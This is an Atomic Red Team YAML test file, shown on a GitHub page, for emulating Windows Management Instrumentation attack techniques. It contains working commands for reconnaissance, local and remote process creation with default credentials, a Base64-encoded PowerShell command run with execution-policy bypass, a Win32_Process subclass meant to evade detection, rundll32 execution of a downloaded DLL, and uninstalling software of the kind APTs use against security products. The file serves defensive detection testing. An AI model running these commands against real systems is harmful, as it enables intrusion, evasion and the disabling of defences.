-
Notifications
You must be signed in to change notification settings - Fork 2.8k
/
T1047.yaml
212 lines (212 loc) · 9.53 KB
/
T1047.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
attack_technique: T1047
display_name: Windows Management Instrumentation
atomic_tests:
- name: WMI Reconnaissance Users
auto_generated_guid: c107778c-dcf5-47c5-af2e-1d058a3df3ea
description: |
An adversary might use WMI to list all local User Accounts.
When the test completes , there should be local user accounts information displayed on the command line.
supported_platforms:
- windows
executor:
command: |
wmic useraccount get /ALL /format:csv
name: command_prompt
- name: WMI Reconnaissance Processes
auto_generated_guid: 5750aa16-0e59-4410-8b9a-8a47ca2788e2
description: |
An adversary might use WMI to list Processes running on the compromised host.
When the test completes , there should be running processes listed on the command line.
supported_platforms:
- windows
executor:
command: |
wmic process get caption,executablepath,commandline /format:csv
name: command_prompt
- name: WMI Reconnaissance Software
auto_generated_guid: 718aebaa-d0e0-471a-8241-c5afa69c7414
description: |
An adversary might use WMI to list installed Software hotfix and patches.
When the test completes, there should be a list of installed patches and when they were installed.
supported_platforms:
- windows
executor:
command: |
wmic qfe get description,installedOn /format:csv
name: command_prompt
- name: WMI Reconnaissance List Remote Services
auto_generated_guid: 0fd48ef7-d890-4e93-a533-f7dedd5191d3
description: |
An adversary might use WMI to check if a certain Remote Service is running on a remote device.
When the test completes, a service information will be displayed on the screen if it exists.
A common feedback message is that "No instance(s) Available" if the service queried is not running.
A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable"
if the provided remote host is unreachable
supported_platforms:
- windows
input_arguments:
node:
description: Ip Address
type: string
default: 127.0.0.1
service_search_string:
description: Name Of Service
type: string
default: Spooler
executor:
command: |
wmic /node:"#{node}" service where (caption like "%#{service_search_string}%")
name: command_prompt
- name: WMI Execute Local Process
auto_generated_guid: b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3
description: |
This test uses wmic.exe to execute a process on the local host.
When the test completes , a new process will be started locally .A notepad application will be started when input is left on default.
supported_platforms:
- windows
input_arguments:
process_to_execute:
description: Name or path of process to execute.
type: string
default: notepad.exe
executor:
command: |
wmic process call create #{process_to_execute}
cleanup_command: |
wmic process where name='#{process_to_execute}' delete >nul 2>&1
name: command_prompt
- name: WMI Execute Remote Process
auto_generated_guid: 9c8ef159-c666-472f-9874-90c8d60d136b
description: |
This test uses wmic.exe to execute a process on a remote host. Specify a valid value for remote IP using the node parameter.
To clean up, provide the same node input as the one provided to run the test
A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the default or provided IP is unreachable
supported_platforms:
- windows
input_arguments:
node:
description: Ip Address
type: string
default: 127.0.0.1
user_name:
description: Username
type: string
default: DOMAIN\Administrator
password:
description: Password
type: string
default: P@ssw0rd1
process_to_execute:
description: Name or path of process to execute.
type: string
default: notepad.exe
executor:
command: |
wmic /user:#{user_name} /password:#{password} /node:"#{node}" process call create #{process_to_execute}
cleanup_command: |
wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name='#{process_to_execute}' delete >nul 2>&1
name: command_prompt
- name: Create a Process using WMI Query and an Encoded Command
auto_generated_guid: 7db7a7f9-9531-4840-9b30-46220135441c
description: |
Solarigate persistence is achieved via backdoors deployed via various techniques including using PowerShell with an EncodedCommand
Powershell -nop -exec bypass -EncodedCommand <encoded command>
Where the –EncodedCommand, once decoded, would resemble:
Invoke-WMIMethod win32_process -name create -argumentlist ‘rundll32 c:\windows\idmu\common\ypprop.dll _XInitImageFuncPtrs’ -ComputerName WORKSTATION
The EncodedCommand in this atomic is the following: Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe
You should expect to see notepad.exe running after execution of this test.
[Solarigate Analysis from Microsoft](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/)
supported_platforms:
- windows
executor:
command: |
powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA
name: command_prompt
- name: Create a Process using obfuscated Win32_Process
auto_generated_guid: 10447c83-fc38-462a-a936-5102363b1c43
description: |
This test tries to mask process creation by creating a new class that inherits from Win32_Process. Indirect call of suspicious method such as Win32_Process::Create can break detection logic.
[Cybereason blog post No Win32_ProcessNeeded](https://www.cybereason.com/blog/wmi-lateral-movement-win32)
supported_platforms:
- windows
input_arguments:
new_class:
description: Derived class name
type: string
default: Win32_Atomic
process_to_execute:
description: Name or path of process to execute.
type: string
default: notepad.exe
executor:
name: powershell
elevation_required: true
command: |
$Class = New-Object Management.ManagementClass(New-Object Management.ManagementPath("Win32_Process"))
$NewClass = $Class.Derive("#{new_class}")
$NewClass.Put()
Invoke-WmiMethod -Path #{new_class} -Name create -ArgumentList #{process_to_execute}
cleanup_command: |
$CleanupClass = New-Object Management.ManagementClass(New-Object Management.ManagementPath("#{new_class}"))
try { $CleanupClass.Delete() } catch {}
- name: WMI Execute rundll32
auto_generated_guid: 00738d2a-4651-4d76-adf2-c43a41dfb243
description: |
This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter.
supported_platforms:
- windows
input_arguments:
node:
description: Ip Address
type: string
default: 127.0.0.1
dll_to_execute:
description: Path to DLL.
type: string
default: PathToAtomicsFolder\..\ExternalPayloads\calc.dll
function_to_execute:
description: Name of DLL function to call
type: string
default: StartW
dependency_executor_name: powershell
dependencies:
- description: DLL with function to execute must exist on disk at specified location (#{dll_to_execute})
prereq_command: |
if (Test-Path "#{dll_to_execute}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/bin/calc.dll?raw=true" -OutFile "#{dll_to_execute}"
executor:
command: |
wmic /node:#{node} process call create "rundll32.exe \"#{dll_to_execute}\" #{function_to_execute}"
cleanup_command: |-
taskkill /f /im calculator.exe
name: command_prompt
- name: Application uninstall using WMIC
auto_generated_guid: c510d25b-1667-467d-8331-a56d3e9bc4ff
description: Emulates uninstalling applications using WMIC. This method only works if the product was installed with an msi file. APTs have been seen using this to uninstall security products.
supported_platforms:
- windows
input_arguments:
node:
description: Computer the action is being executed against but defaults to the localhost.
type: string
default: 127.0.0.1
product:
description: Enter the product name being uninstalled. This will default to TightVNC.
type: string
default: Tightvnc
dependency_executor_name: powershell
dependencies:
- description: TightVNC must be installed.
prereq_command: if ((Test-Path "C:\Program Files\TightVNC\tvnviewer.exe")-Or (Test-Path "C:\Program Files (x86)\TightVNC\tvnviewer.exe")) {exit 0} else {exit 1}
get_prereq_command: |-
Invoke-WebRequest 'https://www.tightvnc.com/download/2.8.63/tightvnc-2.8.63-gpl-setup-64bit.msi' -OutFile "PathToAtomicsFolder\..\ExternalPayloads\tightvncinstaller.msi"
start-sleep -s 10
msiexec /i "PathToAtomicsFolder\..\ExternalPayloads\tightvncinstaller.msi" /qn /norestart
start-sleep -s 15
executor:
command: wmic /node:"#{node}" product where "name like '#{product}%%'" call uninstall
cleanup_command: msiexec /i "PathToAtomicsFolder\..\ExternalPayloads\tightvncinstaller.msi" /qn /norestart
name: command_prompt
elevation_required: true